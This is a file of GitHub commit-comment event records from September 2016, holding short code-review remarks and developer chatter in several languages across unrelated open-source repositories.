{"id":"4511765145","type":"CommitCommentEvent","actor":{"login":"rubenmachuca"},"repo":{"name":"rubenmachuca/openpay-opencart"},"payload":{"comment":{"id":18889208,"position":4,"line":80,"path":"openpay_cards/catalog/view/theme/default/template/payment/openpay_cards.tpl","commit_id":"a2af0c5e32680f5be1b030ef7cfbae92b7bcfc39","created_at":"2016-09-03T07:20:08Z","updated_at":"2016-09-03T07:20:08Z","body":"\r\n[Online Payments Market Guide 2015 – insights into payments and ecommerce.pdf](https://github.com/rubenmachuca/openpay-opencart/files/453238/Online.Payments.Market.Guide.2015.insights.into.payments.and.ecommerce.pdf)\r\n"}},"created_at":"2016-09-03T07:20:08Z"}
{"id":"4511767110","type":"CommitCommentEvent","actor":{"login":"LiYGCNA"},"repo":{"name":"LiYGCNA/hello-world"},"payload":{"comment":{"id":18889209,"position":8,"line":8,"path":"README.md","commit_id":"db86fea7971f36b562f017ec5a9f8305b2f45a9d","created_at":"2016-09-03T07:22:04Z","updated_at":"2016-09-03T07:22:04Z","body":"second update"}},"created_at":"2016-09-03T07:22:04Z"}
{"id":"4511767694","type":"CommitCommentEvent","actor":{"login":"zaxlct"},"repo":{"name":"2remote/yaopai-mobile"},"payload":{"comment":{"id":18889210,"position":null,"line":null,"path":null,"commit_id":"2447ed119ef15dbf09c455a59b1999ca15c8d180","created_at":"2016-09-03T07:22:40Z","updated_at":"2016-09-03T07:22:40Z","body":"GOOD!"}},"created_at":"2016-09-03T07:22:40Z"}
{"id":"4511768561","type":"CommitCommentEvent","actor":{"login":"erikkemperman"},"repo":{"name":"erikkemperman/vinyl-prepare"},"payload":{"comment":{"id":18889211,"position":30,"line":34,"path":"index.js","commit_id":"e19492906f1d0de40412cefb6cd4589720d06ecf","created_at":"2016-09-03T07:23:27Z","updated_at":"2016-09-03T07:23:27Z","body":"Right, thanks, I'll have another look at it."}},"created_at":"2016-09-03T07:23:27Z"}
{"id":"4511768867","type":"CommitCommentEvent","actor":{"login":"phuedx"},"repo":{"name":"phuedx/elixir_quest"},"payload":{"comment":{"id":18889212,"position":null,"line":null,"path":null,"commit_id":"62d18a661e9b3c907116fd9a525d6c4bfbffa167","created_at":"2016-09-03T07:23:47Z","updated_at":"2016-09-03T07:23:47Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;uSwfhUNX&#x2F;3-handshake\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Handshake</a>"}},"created_at":"2016-09-03T07:23:47Z"}
{"id":"4511769171","type":"CommitCommentEvent","actor":{"login":"MTK4355"},"repo":{"name":"MTK4355/PokemonGo-Bot"},"payload":{"comment":{"id":18889213,"position":null,"line":null,"path":null,"commit_id":"2216ae7728375c116965cb9a97c6f363ecfc2e9c","created_at":"2016-09-03T07:24:04Z","updated_at":"2016-09-03T07:24:04Z","body":"LMAO. Use it for testing if you want, it's a throw away account. "}},"created_at":"2016-09-03T07:24:04Z"}
{"id":"4511769818","type":"CommitCommentEvent","actor":{"login":"gyrog"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":18889215,"position":null,"line":null,"path":null,"commit_id":"fb076eba09160c2b2eee37f8f70a4f32235aad91","created_at":"2016-09-03T07:24:41Z","updated_at":"2016-09-03T07:24:41Z","body":"@peabee, thanks for proof reading this stuff."}},"created_at":"2016-09-03T07:24:41Z"}
{"id":"4511770225","type":"CommitCommentEvent","actor":{"login":"SH-M"},"repo":{"name":"IAHM-COL/KingAir-350"},"payload":{"comment":{"id":18889216,"position":null,"line":null,"path":null,"commit_id":"d13e6ddeed75a28c00128d1782106672dd530870","created_at":"2016-09-03T07:25:03Z","updated_at":"2016-09-03T07:25:03Z","body":"go for it :smile: "}},"created_at":"2016-09-03T07:25:03Z"}
{"id":"4511770389","type":"CommitCommentEvent","actor":{"login":"ThadHouse"},"repo":{"name":"Team5593/DotNetDash"},"payload":{"comment":{"id":18889217,"position":7,"line":26,"path":"DotNetDash/NetworkTableBackedLookup.cs","commit_id":"a22b7c062a42cc7c5713c26181bc87fdc6d69d93","created_at":"2016-09-03T07:25:14Z","updated_at":"2016-09-03T07:25:14Z","body":"This code does not work. GetValue now returns a Value type, therefore you cannot check if value is T, as that will never be true. PR #1 updates this to work properly with the new values, however that is waiting on some changes from FIRST before merging."}},"created_at":"2016-09-03T07:25:14Z"}
{"id":"4511770661","type":"CommitCommentEvent","actor":{"login":"merimad"},"repo":{"name":"merimad/Zadace"},"payload":{"comment":{"id":18889218,"position":null,"line":null,"path":null,"commit_id":"dd83f5a202be553c794f56195084a32121fb8330","created_at":"2016-09-03T07:25:29Z","updated_at":"2016-09-03T07:25:29Z","body":"cao irfane, uploadala sam projekat kao zip posto nisam htjela sa koleginog da commitam  \tFoodTracker_v1.zip to je ovaj file"}},"created_at":"2016-09-03T07:25:29Z"}
{"id":"4511773146","type":"CommitCommentEvent","actor":{"login":"7172"},"repo":{"name":"7172/i.need.you"},"payload":{"comment":{"id":18889221,"position":null,"line":null,"path":null,"commit_id":"3c2afa4a22814b205b1578e67aea04a00875924a","created_at":"2016-09-03T07:28:07Z","updated_at":"2016-09-03T07:28:07Z","body":"Tired"}},"created_at":"2016-09-03T07:28:07Z"}
{"id":"4511774125","type":"CommitCommentEvent","actor":{"login":"phated"},"repo":{"name":"erikkemperman/vinyl-prepare"},"payload":{"comment":{"id":18889223,"position":30,"line":34,"path":"index.js","commit_id":"e19492906f1d0de40412cefb6cd4589720d06ecf","created_at":"2016-09-03T07:29:03Z","updated_at":"2016-09-03T07:29:03Z","body":"When the `stat` option isn't specified, no `stat`ing seems to be done and `statCache` is empty.  When it is set to `true`, it seems to put stats for every found path.  I don't see how this would be better than `stat`ing in vinyl-fs."}},"created_at":"2016-09-03T07:29:03Z"}
{"id":"4511777500","type":"CommitCommentEvent","actor":{"login":"ridiculous"},"repo":{"name":"solanolabs/tddium"},"payload":{"comment":{"id":18889225,"position":null,"line":null,"path":null,"commit_id":"47134057d3aa01e531dd929c9f20a3e9b3eae9d9","created_at":"2016-09-03T07:32:26Z","updated_at":"2016-09-03T07:32:26Z","body":"Good to know! Yeah, removing that dependency would be great! I see it's still in the solano gem as well"}},"created_at":"2016-09-03T07:32:26Z"}
{"id":"4511777723","type":"CommitCommentEvent","actor":{"login":"thierryvolpiatto"},"repo":{"name":"emacs-helm/helm"},"payload":{"comment":{"id":18889226,"position":null,"line":null,"path":null,"commit_id":"f2768d92ee712ec065d22423798dbbd8137f36cd","created_at":"2016-09-03T07:32:39Z","updated_at":"2016-09-03T07:32:39Z","body":"\nTianxiang Xiong <notifications@github.com> writes:\n\n> I have a need to use helm-preselect directly in order to specify a\n> source, and I need to set helm--force-updating-p to do\n> so.\n\nYou should not have to do this, I don't recall exactly why I did this,\nbut AFAICT now helm-preselect should allow using SOURCE when specified,\neven when helm--force-updating-p is nil, I will look into this. \n\nThanks.\n\n--\nThierry\n"}},"created_at":"2016-09-03T07:32:39Z"}
{"id":"4511784066","type":"CommitCommentEvent","actor":{"login":"Viper2k4"},"repo":{"name":"MTK4355/PokemonGo-Bot"},"payload":{"comment":{"id":18889231,"position":null,"line":null,"path":null,"commit_id":"2216ae7728375c116965cb9a97c6f363ecfc2e9c","created_at":"2016-09-03T07:38:53Z","updated_at":"2016-09-03T07:38:53Z","body":"I have my own. I simply checked the changes^^"}},"created_at":"2016-09-03T07:38:53Z"}
{"id":"4511785015","type":"CommitCommentEvent","actor":{"login":"sabsofiane"},"repo":{"name":"sabsofiane/worldclock"},"payload":{"comment":{"id":18889232,"position":5,"line":4,"path":"index.html","commit_id":"16f2d08e8f8e78a7b273cd4cf633b16465958c96","created_at":"2016-09-03T07:39:46Z","updated_at":"2016-09-03T07:39:46Z","body":"Mettre le code dans un fichier CSS."}},"created_at":"2016-09-03T07:39:46Z"}
{"id":"4511785737","type":"CommitCommentEvent","actor":{"login":"sabsofiane"},"repo":{"name":"sabsofiane/worldclock"},"payload":{"comment":{"id":18889233,"position":7,"line":5,"path":"index.html","commit_id":"16f2d08e8f8e78a7b273cd4cf633b16465958c96","created_at":"2016-09-03T07:40:23Z","updated_at":"2016-09-03T07:40:23Z","body":"Mettre le code sous fichier CSS."}},"created_at":"2016-09-03T07:40:23Z"}
{"id":"4511786222","type":"CommitCommentEvent","actor":{"login":"sabsofiane"},"repo":{"name":"sabsofiane/worldclock"},"payload":{"comment":{"id":18889234,"position":4,"line":3,"path":"index.html","commit_id":"16f2d08e8f8e78a7b273cd4cf633b16465958c96","created_at":"2016-09-03T07:40:50Z","updated_at":"2016-09-03T07:40:50Z","body":"Mettre le code sous fichier CSS."}},"created_at":"2016-09-03T07:40:50Z"}
{"id":"4511786725","type":"CommitCommentEvent","actor":{"login":"tushar-dadlani"},"repo":{"name":"cloudfoundry/capi-release"},"payload":{"comment":{"id":18889237,"position":null,"line":null,"path":null,"commit_id":"092d28ace2528b4b455c5445889a71a835da3abe","created_at":"2016-09-03T07:41:18Z","updated_at":"2016-09-03T07:41:18Z","body":"We tried use this to validate table_rows from information_schema.tables, InnoDB only gives approximate row counts. You will always get a diff if you are using the InnoDB storage engine."}},"created_at":"2016-09-03T07:41:18Z"}
{"id":"4511787147","type":"CommitCommentEvent","actor":{"login":"xinhbtt"},"repo":{"name":"xinhbtt/hello-world"},"payload":{"comment":{"id":18889238,"position":2,"line":2,"path":"README.md","commit_id":"bfa56537d010594cdf14ecb92ed38b21ad9de244","created_at":"2016-09-03T07:41:45Z","updated_at":"2016-09-03T07:41:45Z","body":"Change first time."}},"created_at":"2016-09-03T07:41:45Z"}
{"id":"4511787909","type":"CommitCommentEvent","actor":{"login":"quesoo"},"repo":{"name":"yu-aosp-n/platform_build"},"payload":{"comment":{"id":18889239,"position":null,"line":null,"path":null,"commit_id":"d06722e07a77c003cd6ff32f08f9246928dc1a0b","created_at":"2016-09-03T07:42:25Z","updated_at":"2016-09-03T07:42:25Z","body":"yeah boy. you are the best"}},"created_at":"2016-09-03T07:42:25Z"}
{"id":"4511789047","type":"CommitCommentEvent","actor":{"login":"sabsofiane"},"repo":{"name":"sabsofiane/worldclock"},"payload":{"comment":{"id":18889240,"position":null,"line":null,"path":null,"commit_id":"bda745a9da493f27992da4fb7afb8da1d38e9d14","created_at":"2016-09-03T07:43:13Z","updated_at":"2016-09-03T07:43:13Z","body":"OK,"}},"created_at":"2016-09-03T07:43:13Z"}
{"id":"4511789931","type":"CommitCommentEvent","actor":{"login":"tochman"},"repo":{"name":"thesuss/practice_challenges"},"payload":{"comment":{"id":18889241,"position":5,"line":13,"path":"challenge_5/book.rb","commit_id":"a35751ae4013a67444e0fa87704990936fdfbd45","created_at":"2016-09-03T07:44:03Z","updated_at":"2016-09-03T07:44:03Z","body":"Här får du tänka till lite grand. Vad är en 'source citation' ('källhänvisning') och hur används det? \r\nTänk på att namnge dina metoder efter vad de gör. ;-)\r\nEn annan sak jag har synpunkter på är att du väljer att skicka in booken som ett argument. Behöver du verkligen göra det? Har du tillgång till `self`? "}},"created_at":"2016-09-03T07:44:03Z"}
{"id":"4511790933","type":"CommitCommentEvent","actor":{"login":"tochman"},"repo":{"name":"thesuss/practice_challenges"},"payload":{"comment":{"id":18889245,"position":null,"line":null,"path":null,"commit_id":"a35751ae4013a67444e0fa87704990936fdfbd45","created_at":"2016-09-03T07:45:02Z","updated_at":"2016-09-03T07:45:02Z","body":"Mycket bra svar!"}},"created_at":"2016-09-03T07:45:02Z"}
{"id":"4511791024","type":"CommitCommentEvent","actor":{"login":"luoml"},"repo":{"name":"Xuanwo/xuanwo.github.io"},"payload":{"comment":{"id":18889246,"position":null,"line":null,"path":null,"commit_id":"55899004321da831d01ca1111f5f7bf26fcfefd7","created_at":"2016-09-03T07:45:09Z","updated_at":"2016-09-03T07:45:09Z","body":"版权信息不错，我借用了，博主不介意吧。\r\n有个小bug，分钟写错了，必须用小写，否则取出的时间不对。YYYY年M月D日 - HH时mm分"}},"created_at":"2016-09-03T07:45:09Z"}
{"id":"4511791535","type":"CommitCommentEvent","actor":{"login":"tomato42"},"repo":{"name":"tlswg/tls13-spec"},"payload":{"comment":{"id":18889247,"position":4,"line":1094,"path":"draft-ietf-tls-tls13.md","commit_id":"1cfa45e196ee0c0eaa09feefc6d5a177417fd1fe","created_at":"2016-09-03T07:45:34Z","updated_at":"2016-09-03T07:45:34Z","body":"there's \"e.g., a 17-byte vector of uint16 would be illegal\" just few lines above, but it does not encompass the \"<300..400>\" case..."}},"created_at":"2016-09-03T07:45:34Z"}
{"id":"4511794833","type":"CommitCommentEvent","actor":{"login":"tvvocold"},"repo":{"name":"jiangxin/git"},"payload":{"comment":{"id":18889253,"position":null,"line":null,"path":null,"commit_id":"5c57d7622e3c7c685345f9736c4c924349a321dd","created_at":"2016-09-03T07:48:32Z","updated_at":"2016-09-03T07:48:32Z","body":"Hi Jiangxin，\r\nhttps://github.com/jiangxin/git/blob/5c57d7622e3c7c685345f9736c4c924349a321dd/po/zh_CN.po#L952 中\r\nmsgid \"--follow requires exactly one pathspec\" 的 requires 本意为需求/需要，“只”有些不达意，故这句翻译建议改为“--follow 参数后需要一个 pathspec”\r\n\r\nhttps://github.com/jiangxin/git/blob/5c57d7622e3c7c685345f9736c4c924349a321dd/po/zh_CN.po#L1036 中多了一个“要”\r\n\r\nhttps://github.com/jiangxin/git/blob/5c57d7622e3c7c685345f9736c4c924349a321dd/po/zh_CN.po#L12884 建议译为“保存以备您再次需要。”\r\n\r\n辛苦 👍 "}},"created_at":"2016-09-03T07:48:32Z"}
{"id":"4511794838","type":"CommitCommentEvent","actor":{"login":"warislaigeek"},"repo":{"name":"warislaigeek/PWA"},"payload":{"comment":{"id":18889254,"position":null,"line":null,"path":null,"commit_id":"7996c5e158e4f332ec4e192fbdeed94ba1e39859","created_at":"2016-09-03T07:48:32Z","updated_at":"2016-09-03T07:48:32Z","body":"Progressive web apps could be the next big thing for the mobile web. Originally proposed by Google in 2015, they have already attracted a lot of attention because of the relative ease of development and the almost instant wins for the application’s user experience.\r\n\r\nWhy Progressive Web Apps? Link\r\n1.Push notifications in Web Apps(applications with push notifications achieve up to three times more retention than their counterparts without push)\r\n2.Immediately start using( A user must first find the app in an app store, download it, install it and then, finally, open it. When a user finds your progressive web app, they will be able to immediately start using it, eliminating the unnecessary downloading and installation stages. And when the user returns to the app, they will be prompted to install the app and upgrade to a full-screen experience)\r\n3.Progressive( a progressive web app must work on any device)\r\n4.Discoverable(Because a progressive web app is a website, it should be discoverable in search engines. This is a major advantage over native applications, which still lag behind websites in searchability)\r\n5.Connectivity-independent(It should work in areas of low connectivity or offline (My favorite characteristic)).\r\n6.Installable(A progressive web app can be installed on the device’s home screen, making it readily available)"}},"created_at":"2016-09-03T07:48:32Z"}
{"id":"4511796880","type":"CommitCommentEvent","actor":{"login":"gautierhattenberger"},"repo":{"name":"paparazzi/paparazzi"},"payload":{"comment":{"id":18889255,"position":null,"line":null,"path":null,"commit_id":"16a447da37ea718646906756cda17a5ed38d8739","created_at":"2016-09-03T07:50:22Z","updated_at":"2016-09-03T07:50:22Z","body":"It is not necessary to change it. At least it will not break anything nor change behavior.\r\nThe benefit of using `ap_mode` instead of `auto2_mode` is that it woks without RC, while you need a RC on with the switch on \"AUTO2\" to actually change the mode. Actually, using the RC prevent to change the mode with the `ap_mode` setting except for safety modes.\r\nSo it all depends on your setup, with or without RC."}},"created_at":"2016-09-03T07:50:22Z"}
{"id":"4511797203","type":"CommitCommentEvent","actor":{"login":"warislaigeek"},"repo":{"name":"warislaigeek/PWA"},"payload":{"comment":{"id":18889257,"position":null,"line":null,"path":null,"commit_id":"7996c5e158e4f332ec4e192fbdeed94ba1e39859","created_at":"2016-09-03T07:50:43Z","updated_at":"2016-09-03T07:50:43Z","body":"**## Progressive web apps could be the next big thing for the mobile web. Originally proposed by Google in 2015, they have already attracted a lot of attention because of the relative ease of development and the almost instant wins for the application’s user experience.**\r\n\r\n**## Why Progressive Web Apps**\r\n\r\n1.Push notifications in Web Apps(applications with push notifications achieve up to three times more retention than their counterparts without push)\r\n2.Immediately start using( A user must first find the app in an app store, download it, install it and then, finally, open it. When a user finds your progressive web app, they will be able to immediately start using it, eliminating the unnecessary downloading and installation stages. And when the user returns to the app, they will be prompted to install the app and upgrade to a full-screen experience)\r\n3.Progressive( a progressive web app must work on any device)\r\n4.Discoverable(Because a progressive web app is a website, it should be discoverable in search engines. This is a major advantage over native applications, which still lag behind websites in searchability)\r\n5.Connectivity-independent(It should work in areas of low connectivity or offline (My favorite characteristic)).\r\n6.Installable(A progressive web app can be installed on the device’s home screen, making it readily available)"}},"created_at":"2016-09-03T07:50:43Z"}
{"id":"4511798081","type":"CommitCommentEvent","actor":{"login":"iyangqiong"},"repo":{"name":"iyangqiong/test"},"payload":{"comment":{"id":18889259,"position":1,"line":1,"path":"2","commit_id":"c5ab35cae5169eb0dbbd401f48c9c4c3a284a14f","created_at":"2016-09-03T07:51:39Z","updated_at":"2016-09-03T07:51:39Z","body":"15"}},"created_at":"2016-09-03T07:51:39Z"}
{"id":"4511810104","type":"CommitCommentEvent","actor":{"login":"ilyubin"},"repo":{"name":"grafkalugin/JavaCourse"},"payload":{"comment":{"id":18889266,"position":35,"line":184,"path":"addressbook-web-tests/src/test/java/ru/stqa/javacourse/addressbook/appmanager/ContactHelper.java","commit_id":"789f088c4983bb2a040fdc778dd5eab95f7c8080","created_at":"2016-09-03T08:03:19Z","updated_at":"2016-09-03T08:03:19Z","body":"By.xpath(\"./ancestor::td\") - можно искать конкретного родителя наверх"}},"created_at":"2016-09-03T08:03:19Z"}
{"id":"4511812426","type":"CommitCommentEvent","actor":{"login":"mfonville"},"repo":{"name":"opengapps/arm64"},"payload":{"comment":{"id":18889268,"position":null,"line":null,"path":null,"commit_id":"97564c84320e418cdd1d531726b71fbcaa8e70a3","created_at":"2016-09-03T08:05:39Z","updated_at":"2016-09-03T08:05:39Z","body":"https://github.com/opengapps/opengapps/commit/cbd8c235e91c959a6ce9d05cc2222e659294fe72\r\n\r\n@NicholasBuse "}},"created_at":"2016-09-03T08:05:39Z"}
{"id":"4511812920","type":"CommitCommentEvent","actor":{"login":"schwabe"},"repo":{"name":"schwabe/opentx"},"payload":{"comment":{"id":18889270,"position":null,"line":null,"path":null,"commit_id":"e9c91cd0ff709fb88f9cdeb36224b309a39c4843","created_at":"2016-09-03T08:06:10Z","updated_at":"2016-09-03T08:06:10Z","body":"@bsongis at the moment building a dmg doesn't even work on my own mac. I want to fix the dmg building first, after we can look at your OS VM."}},"created_at":"2016-09-03T08:06:10Z"}
{"id":"4511815400","type":"CommitCommentEvent","actor":{"login":"killjoy1221"},"repo":{"name":"PonyvilleSquare/ServerBridge"},"payload":{"comment":{"id":18889272,"position":27,"line":27,"path":"src/com/pvs/serverbridge/ServerBridgePlugin.java","commit_id":"9111d03b0dff805f19a0ec36c064b5b1d199cb16","created_at":"2016-09-03T08:08:20Z","updated_at":"2016-09-03T08:08:20Z","body":"What was wrong with importing?"}},"created_at":"2016-09-03T08:08:20Z"}
{"id":"4511816100","type":"CommitCommentEvent","actor":{"login":"acfatah"},"repo":{"name":"edro/serializable-closure"},"payload":{"comment":{"id":18889275,"position":null,"line":null,"path":null,"commit_id":"2e039493f78f68cfafe2973bee5d4ad441bfc8b4","created_at":"2016-09-03T08:09:05Z","updated_at":"2016-09-03T08:09:05Z","body":"Can you give a use case where we have to convert the code string to anonymous function? A simple unit test maybe.\r\n\r\nWe are saving the closure as lines of code for `eval` function later after serialization. As far as I know, we do not have anonymous function or Closure with the `^(function)\\s+(\\w+)\\s*(\\()` pattern."}},"created_at":"2016-09-03T08:09:05Z"}
{"id":"4511817732","type":"CommitCommentEvent","actor":{"login":"thomasfanell"},"repo":{"name":"syspl/syspl"},"payload":{"comment":{"id":18889278,"position":1,"line":1,"path":"SysPL.SyntaxTree/Type/Experssion.cs","commit_id":"40787c4c489975b6ca514e5b321acf30fb1c8b67","created_at":"2016-09-03T08:10:38Z","updated_at":"2016-09-03T08:10:38Z","body":"Filename typo."}},"created_at":"2016-09-03T08:10:38Z"}
{"id":"4511818291","type":"CommitCommentEvent","actor":{"login":"nimati"},"repo":{"name":"k9101/FCAlertView"},"payload":{"comment":{"id":18889280,"position":null,"line":null,"path":null,"commit_id":"2f4d2ce8a0d58dace2ec53e5b74e6702fc1fd523","created_at":"2016-09-03T08:11:11Z","updated_at":"2016-09-03T08:11:11Z","body":"Hey Kris,\r\n\r\nNoticed you're working on the Swift version for FCAlertView, which is very awesome and exciting.\r\nWanted to just check up with you and see how it's going, see if there's any issues or questions you might have or if I can help contribute to it in any way, although I mostly work in ObjC as you've noticed. \r\n\r\nLet me know 👍 @k9101 "}},"created_at":"2016-09-03T08:11:11Z"}
{"id":"4511820397","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":18889281,"position":null,"line":null,"path":null,"commit_id":"00004442774cce1e7d8ca337afd99c4e90a3fb48","created_at":"2016-09-03T08:13:11Z","updated_at":"2016-09-03T08:13:11Z","body":"Yes,\r\n\r\nhttps://github.com/LimeSurvey/LimeSurvey/blob/00004442774cce1e7d8ca337afd99c4e90a3fb48/application/helpers/qanda_helper.php#L19\r\n\r\nBut this part is outdated. (i don't think we use https://github.com/LimeSurvey/LimeSurvey/blob/00004442774cce1e7d8ca337afd99c4e90a3fb48/application/helpers/qanda_helper.php#L37 ) and if i remind $ia['10'] and 11 are used for randomization."}},"created_at":"2016-09-03T08:13:11Z"}
{"id":"4511820422","type":"CommitCommentEvent","actor":{"login":"IgorProtasov"},"repo":{"name":"IgorProtasov/test_project03sep"},"payload":{"comment":{"id":18889282,"position":null,"line":null,"path":null,"commit_id":"43644938cee4ad7eb58d303a54a6c4a6f2660c10","created_at":"2016-09-03T08:13:13Z","updated_at":"2016-09-03T08:13:13Z","body":"dfd"}},"created_at":"2016-09-03T08:13:13Z"}
{"id":"4511820435","type":"CommitCommentEvent","actor":{"login":"ilyubin"},"repo":{"name":"nkensitskaya/java_rep"},"payload":{"comment":{"id":18889283,"position":48,"line":167,"path":"addressbook/src/test/java/test/addressbook/pack/appmanager/ContactHelper.java","commit_id":"8e057573c3d804c43a6f1cd403ff7f6616c7b1a6","created_at":"2016-09-03T08:13:14Z","updated_at":"2016-09-03T08:13:14Z","body":"wd.findElement(By.name(\"firstname\")).getAttribute(\"value\");\r\n- из это конструкции можно сделать метод, и поместить его в HelperBase\r\ngetElementValue(By by);"}},"created_at":"2016-09-03T08:13:14Z"}
{"id":"4511820810","type":"CommitCommentEvent","actor":{"login":"miglos"},"repo":{"name":"miglos/Doomibot"},"payload":{"comment":{"id":18889284,"position":null,"line":null,"path":null,"commit_id":"7c17175de74f5ff3004e2381b98ff7042d3c47e7","created_at":"2016-09-03T08:13:39Z","updated_at":"2016-09-03T08:13:39Z","body":"What is this"}},"created_at":"2016-09-03T08:13:39Z"}
{"id":"4511822247","type":"CommitCommentEvent","actor":{"login":"andrewtelnov"},"repo":{"name":"hangedplane/taskFromITMO"},"payload":{"comment":{"id":18889286,"position":null,"line":null,"path":null,"commit_id":"7c8764edfe72e3644acbce7e718e2359b6ec8665","created_at":"2016-09-03T08:15:14Z","updated_at":"2016-09-03T08:15:14Z","body":"I would extract a function from getRes().\r\n```\r\nfor (i = 0; i < numberOfBroads; i ++){\r\n  broads[i].result = getNumbersCount(n, values, broads[i].left, broads[i].right);\r\n}\r\n```\r\nThe code will be clear."}},"created_at":"2016-09-03T08:15:14Z"}
{"id":"4511825732","type":"CommitCommentEvent","actor":{"login":"wysohn"},"repo":{"name":"wysohn/DungeonsXL"},"payload":{"comment":{"id":18889287,"position":8,"line":58,"path":"core/src/main/java/io/github/dre2n/dungeonsxl/command/LeaveCommand.java","commit_id":"db5563121082562d9ddbd185154703e470240aa7","created_at":"2016-09-03T08:18:28Z","updated_at":"2016-09-03T08:18:28Z","body":" //it seems getByPlayer() will return _null_ if player is in edit mode."}},"created_at":"2016-09-03T08:18:28Z"}
{"id":"4511826271","type":"CommitCommentEvent","actor":{"login":"GoogleFrog"},"repo":{"name":"Spring-Chobby/Chobby"},"payload":{"comment":{"id":18889289,"position":8,"line":0,"path":"LuaMenu/widgets/gui_login_window.lua","commit_id":"3cfa67f23f907a15fc73a3266d991871c7f3cd22","created_at":"2016-09-03T08:19:01Z","updated_at":"2016-09-03T08:19:01Z","body":"I've had experience with Spring.Log not working and providing too many options. Make a generic log function as a utility for me to use it."}},"created_at":"2016-09-03T08:19:01Z"}
{"id":"4511830238","type":"CommitCommentEvent","actor":{"login":"saleduke"},"repo":{"name":"saleduke/hello-world"},"payload":{"comment":{"id":18889294,"position":null,"line":null,"path":null,"commit_id":"7c916bece5cd6a18d8bdfe7e398cf94f44a5f3ee","created_at":"2016-09-03T08:22:44Z","updated_at":"2016-09-03T08:22:44Z","body":"komentar na prbni commit"}},"created_at":"2016-09-03T08:22:44Z"}
{"id":"4511831153","type":"CommitCommentEvent","actor":{"login":"Hacker432-Y550"},"repo":{"name":"CarlosArriagaCM/android_kernel_huawei_msm8916"},"payload":{"comment":{"id":18889295,"position":null,"line":null,"path":null,"commit_id":"648e35ba7e84d9ab3d159799b648b0c8fe460852","created_at":"2016-09-03T08:23:40Z","updated_at":"2016-09-03T08:23:40Z","body":"Try this for lis3dh\nhttps://github.com/Hacker432-Y550/android_kernel_huawei_msm8916\n\nY635 as Y550 should have a second driver too and it should be kionix so maybe that one has to be fixed too.\n\nAlso, it's not sure that my commit will work in cm13 kernel because I took the changes from a cm12.1 kernel.\n\nGood luck "}},"created_at":"2016-09-03T08:23:40Z"}
{"id":"4511833032","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"INWT/dbtools"},"payload":{"comment":{"id":18889296,"position":null,"line":null,"path":null,"commit_id":"56591416d69b628adad65eebf9aabb50312a1818","created_at":"2016-09-03T08:25:28Z","updated_at":"2016-09-03T08:25:28Z","body":"[R/writeData.R:5:1:](https://github.com/INWT/dbtools/blob/56591416d69b628adad65eebf9aabb50312a1818/R/writeData.R#L5) *style:* **lines should not be more than 100 characters.**\n```r\n​writeData(db ~ CredentialsList, name ~ character, value ~ data.frame | list, replace ~ logical, ..., applyFun = lapply) %m% {\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```"}},"created_at":"2016-09-03T08:25:28Z"}
{"id":"4511833873","type":"CommitCommentEvent","actor":{"login":"100010"},"repo":{"name":"hatake511522/sample"},"payload":{"comment":{"id":18889298,"position":7,"line":5,"path":"config/routes.rb","commit_id":"34d58d1c772b01fcbc949c4ba961ca2fa74deeb8","created_at":"2016-09-03T08:26:18Z","updated_at":"2016-09-03T08:26:18Z","body":"だからこれ消せばいいんだってばーこのルーティングの記法がミスってるんでしょ"}},"created_at":"2016-09-03T08:26:18Z"}
{"id":"4511834739","type":"CommitCommentEvent","actor":{"login":"bfredl"},"repo":{"name":"neovim/neovim"},"payload":{"comment":{"id":18889301,"position":325,"line":7005,"path":"src/nvim/eval.c","commit_id":"8fb7273ac0b981eeb9afdc82675b908c1600d34f","created_at":"2016-09-03T08:27:05Z","updated_at":"2016-09-03T08:27:05Z","body":"Sorry about that. It was easier to rebase this thing and keeping track by having the corrections separately, but I guess I should have squashed right before merging..."}},"created_at":"2016-09-03T08:27:05Z"}
{"id":"4511834813","type":"CommitCommentEvent","actor":{"login":"maning"},"repo":{"name":"osmlab/sf_building_height_import"},"payload":{"comment":{"id":18889302,"position":null,"line":null,"path":null,"commit_id":"a1d7dbcc4c4ed0d1ee59b953bde593b7c4d0d9d4","created_at":"2016-09-03T08:27:09Z","updated_at":"2016-09-03T08:27:09Z","body":"@bdon, thinking if we are loosing too much data by using [integer values](https://github.com/osmlab/sf_building_height_import/commit/a1d7dbcc4c4ed0d1ee59b953bde593b7c4d0d9d4#diff-c834adb436e98b921981952dbc9f77b3R6).  Wouldn't it be better to round off to at least 2 decimals?  This is what we did for LABuildings. "}},"created_at":"2016-09-03T08:27:09Z"}
{"id":"4511836328","type":"CommitCommentEvent","actor":{"login":"luixxiul"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":18889305,"position":null,"line":null,"path":null,"commit_id":"01ebf62cbc7611bb38d4d746c1ffa7cde849dd49","created_at":"2016-09-03T08:28:44Z","updated_at":"2016-09-03T08:28:44Z","body":"++"}},"created_at":"2016-09-03T08:28:44Z"}
{"id":"4511836382","type":"CommitCommentEvent","actor":{"login":"ashihaby"},"repo":{"name":"MahaGA50/ElasicSearch-docker"},"payload":{"comment":{"id":18889306,"position":6,"line":6,"path":"Dockerfile","commit_id":"5d27ebf48e0b8440f1fe15cb5dc08f6ef25bfd42","created_at":"2016-09-03T08:28:46Z","updated_at":"2016-09-03T08:28:46Z","body":"you didn't find any base docker image for elasticsearch-2.3.5?"}},"created_at":"2016-09-03T08:28:46Z"}
{"id":"4511836986","type":"CommitCommentEvent","actor":{"login":"pattacini"},"repo":{"name":"robotology/icub-main"},"payload":{"comment":{"id":18889310,"position":null,"line":null,"path":null,"commit_id":"14985b3a2ff665f8f27d084a3cfa60ced8270ad5","created_at":"2016-09-03T08:29:19Z","updated_at":"2016-09-03T08:29:19Z","body":"Thanks, but what about its use in this context?\r\nIs it somehow necessary (i.e. it's a fix) and I should port it to other repo too?\r\nFor what reason did you add it?"}},"created_at":"2016-09-03T08:29:19Z"}
